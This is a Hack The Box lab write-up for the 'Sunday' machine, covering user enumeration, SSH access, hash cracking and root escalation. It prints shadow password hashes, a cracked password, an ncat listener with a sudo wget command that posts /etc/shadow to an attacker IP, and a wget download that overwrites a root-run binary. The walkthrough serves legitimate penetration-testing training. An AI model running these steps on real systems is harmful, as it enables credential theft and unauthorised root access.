Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we will show how junior evaluators complete some Hack The Box machines in their road to OSCP, a well-known, respected, and required for many top cybersecurity positions certification. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems due to poor configurations.

Let's start with the fun!

Sunday

Initial Foothold

The initial nmap shows a finger service, which apparently it is used to query information about users on the box. We can leverage this service to enumerate valid users. For that, we can use a script from pentestmonkey, called finger-user-enum.

The script can be used with a wordlist. Taking a stroll through the wordlist from SecLists, I think that we have the best chance with names.txt. perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

We find the following valid usernames:

• access
• admin
• line
• message
• sammy
• sunny

The question is, where do we log in? After doing a full nmap scan, we discover that port 22022 is actually an SSH service: SunSSH 1.3 (protocol 2.0).

If we try to ssh in as any user, we get the following error: Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

StackOverflow to the rescue. ssh admin@10.10.10.76 -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022

Lucky guess: user is sunny and the password is sunday (name of the box). Alternatively, we could have used hydra to bruteforce it.

User

Doing sudo -l shows that we can run /root/troll as root with no password. Unfortunately, it looks like the binary does not do anything useful for us.

Running lse.sh did not help much. It looks like we have to enumerate manually.

After taking a stroll through the file system, we find /backup, which contains shadow.backup (because why not...).

shadow.backup

mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

From that file, we can get the password hash for the user sammy. Cracking it with john and the rockyou.txt wordlist yields sammy's password: cooldude!.

We can now ssh in as user sammy.

Root

Running lse.sh again shows that we can run wget as user root with no password.

A quick search on GTFOBins and we have the way to escalate privileges.

1. Run the listener on Kali: ncat -lnvp 6969 > shadow.
2. Exfiltrate file: sudo /usr/bin/wget --post-file=/etc/shadow http://10.10.14.13:6969

Could not crack root's password, so I just exfiltrated root.txt instead.

Bonus

After watching Ippsec's video on this box, it turns out that you can use wget to overwrite the /root/troll file with a different file that just runs bash and execute it with the user sunny.

scuffed_privesc

#!/bin/bash
bash

1. As user sammy: sudo wget 10.10.14.13:8000/scuffed_privesc -O /root/troll.
2. As user sunny: sudo /root/troll.

Note: The file /root/troll is re-written every 5 seconds, so the attack has to be quick.